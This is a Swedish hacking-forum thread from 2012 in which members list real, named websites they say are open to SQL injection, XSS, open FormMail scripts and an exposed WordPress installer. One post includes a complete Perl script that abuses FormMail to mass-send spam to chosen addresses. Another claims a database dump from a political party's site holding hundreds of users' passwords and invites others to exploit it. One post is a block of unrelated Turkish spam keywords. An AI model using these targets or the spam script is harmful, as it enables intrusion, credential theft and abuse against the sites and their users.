Samling av sidor med säkerhetsbrister - Del 2

2012-01-03, 14:51 #**3577**

Medlem

Reg: Aug 2009

Inlägg: 157

blind SQLi
http://investors.skf.com/main.php?p=...afw_id=1169045

Citera

2012-01-03, 19:27 #**3578**

Medlem

Reg: Sep 2006

Inlägg: 713

http://www.shentop.net/news/read.php?id=2976%27

Citera

2012-01-03, 21:45 #**3579**

Medlem

Reg: Aug 2011

Inlägg: 153

http://www.portalmercosur.com/buy.php?id=473

Admin+användares lösenord och användarnamn helt okrypterat

Citera

2012-01-07, 04:15 #**3580**

Medlem

Reg: Nov 2011

Inlägg: 301

http://www.ninelivesgreece.com/cgi-bin/FormMail.pl
http://www.prenhall.com/divisions/hs...n/FormMail.pl?

exploit: http://securitytracker.com/id/1001108

Kanske inte världens roligaste säkerhetsbrist. Men det kan vara svårt för admin att upptäcka att någon utnyttjar den, så har jag i alla fall läst =)

Hade inget att göra och ville testa att koda perl. Koden är säkert full av fel, men den funkar i alla fall ganska bra =) Om någon bättrar på den, skicka gärna ett pm.

#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;

print q(
###############################################

FormMail spam By krimin3ll

Exploit: http://securitytracker.com/id/1001108

vulns:
http://www.ninelivesgreece.com/cgi-bin/FormMail.pl
http://www.prenhall.com/divisions/hs...n/FormMail.pl?

o_O We cant stop here this is bat country..

##############################################

);

print "Single(1)\n";
print "Multi(2)\n";

my $men=<STDIN>;

if ($men==1) {

print "\n Insert host

ex: http://www.site.com\n";
my $host=<STDIN>;
chomp($host);

print "\n Insert uri\n Ex: /cgi-bin/FormMail.pl?\n";
my $uri=<STDIN>;
chomp($uri);

print "Email adress to spam:";
my $adress=<STDIN>;
chomp($adress);

print "\n Message:";
my $mess=<STDIN>;
chomp($mess);

print "Number of emails:";
my $num=<STDIN>;
chomp($num);

my $url2=$host.$uri."recipient=".$adress."&"."message ="."$mess";
my $i=0;
while ($i<=$num)
{

my $agent = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1, timeout => 30);
my $reqo2 = HTTP::Request->new( GET => $url2);
my $response = $agent->request($reqo2);

if ($response->is_success)
{

print $response->as_string;
}

elsif ($response->is_error)
{
print "Error:$url2\n";
print $response->error_as_HTML;
}

$i++;
}
}

if ($men==2)
{

print "\n Insert host

ex: http://www.site.com\n";
my $host=<STDIN>;
chomp($host);

print "\n Insert uri\n Ex: /cgi-bin/FormMail.pl?\n";
my $uri=<STDIN>;
chomp($uri);

print "\n Message:";
my $mess=<STDIN>;
chomp($mess);

print "Input path to text file:\n";
my $filename=<STDIN>;
chomp($filename);
open FH, $filename or die $!;

while (<FH>)
{

my $adress=$_;
chomp($adress);
my $url2=$host.$uri."recipient=".$adress."&"."message ="."$mess";
print $url2;

my $agent = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1, timeout => 30);
my $reqo2 = HTTP::Request->new( GET => $url2);
my $response = $agent->request($reqo2);

if ($response->is_success)
{

print $response->as_string;
}

elsif ($response->is_error)
{
print "Error:$url2\n";
print $response->error_as_HTML;
}

}
}

__________________
Senast redigerad av krimin3ll 2012-01-07 kl. 04:42.

Citera

2012-01-08, 04:17 #**3581**

Medlem

Reg: Jan 2010

Inlägg: 115

http://www.teleservice.net/order/des...rivning=1&id=1
http://www.bikab.com/abonnemang-ejmd.asp?id=1
http://www.auroragroup.eu/shop/forms...%20List&plid=1
http://webshop.moon.se/visaUnderSida.asp?intSida=1
http://inovia.se/viewpost.asp
Post data action=yes&doPostBack=1

Citera

2012-01-08, 13:46 #**3582**

Medlem

Reg: Okt 2010

Inlägg: 645

Citat:

Ursprungligen postat av Mr.MacG

blind SQLi
http://investors.skf.com/main.php?p=...afw_id=1169045

Union based SQLi

Kod:

http://investors.skf.com/main.php?p=topics&id=77

Citera

2012-01-08, 21:48 #**3583**

Medlem

Reg: Sep 2011

Inlägg: 62

XSS vuln. hittad i Yahoo subdomain websida.

http://thehackernews.com/2012/01/xss...-in-yahoo.html

(inte min vuln/exploit)

Citera

2012-01-10, 18:40 #**3584**

Medlem

Reg: Mar 2011

Inlägg: 331

Citat:

Ursprungligen postat av MannennennaM

http://www.erotikpalatset.com/kontak...&tellafriend=1

Är det problemet ? hehe

nları masaj salonu bayan masözler masöz ilanları masaj masaj salonları istanbul bayan arkadaş ilan masaj salonları masaj salonu istanbul avrupa yakası masaj salonları istanbul anadolu yakası bayan masöz istanbul masaj salonları istanbul masaj salonlari istanbul anadolu yakası masaj salonları istanbul masaj salonu masaj salonları istanbul granit mermer dekorasyon Masaj , Masaj Salonları masaj salonları porno izle bedava porno izleme internet rehberi internet rehberi masaj salonu masaj salonu masaj salonu bayan masözler porno izleme masaj masaj salonu masaj masaj salonu kadiköy masaj salonları escort bayanlar escort masöz escort bayanlar istanbul escort bayanlar masöz istanbul masöz bayan masözler masöz istanbul masöz

Citera

2012-01-10, 20:47 #**3585**

Medlem

Reg: Jan 2011

Inlägg: 884

Vet inte om det är en säkerhetsbrist, men vad jag fattar det så kan man nu redigera tinywatchproductions hemsida

För er som inte vet vad det är så är det en youtube-kanal med 17 996 148 visningar, deras hemsida borde då ha rätt många views...

Det eventuella "säkerhetshålet"

http://www.thetinywatch.com/wp-admin/install.php

eller

http://www.thetinywatch.com/

Edit, deras youtube-kanal http://www.youtube.com/tinywatchproductions

Citera

2012-01-10, 22:14 #**3586**

Medlem

Reg: Jan 2010

Inlägg: 115

Citat:

Ursprungligen postat av Oops12

Lite OT:

Försöker ladda hem Havij från deras hemsida men får virus varning trojan, varför det?
http://itsecteam.com/en/projects/project1.htm

För att det har inte med topic att göra...

http://www.gotland.se/tf/wswebb/dag_resultat2.asp
anl=1
http://patrikweb.net/vps_order/vps_order.php
ovrigt=1

Citera

2012-01-14, 03:55 #**3587**

Medlem

Reg: Nov 2011

Inlägg: 301

sqli bohuslänningen
http://212.3.11.251/artikel_pm_standard.php?id=218089

Citera

2012-01-14, 11:56 #**3588**

Medlem

Reg: Jul 2009

Inlägg: 38

http://sundsvallsmoderaterna.se som är hostad av: http://www.gafvert.net är sårbar för SQLi.

Sitter tyvärr inte framför min dator just nu, har bara dumpat ytterst lite från databasen.
Databasen har 500+ användare allt från folk som sitter i styrelsen till riksdagsledamöter i riksdagen.

Många lösenord använder de till sitt intranät för moderat.se dessutom.

Så om någon av er vill ha lite skojj så varsågod!

Citera

Samling av sidor med säkerhetsbrister - Del 2

Skapa ett konto eller logga in för att kommentera

Skapa ett konto

Logga in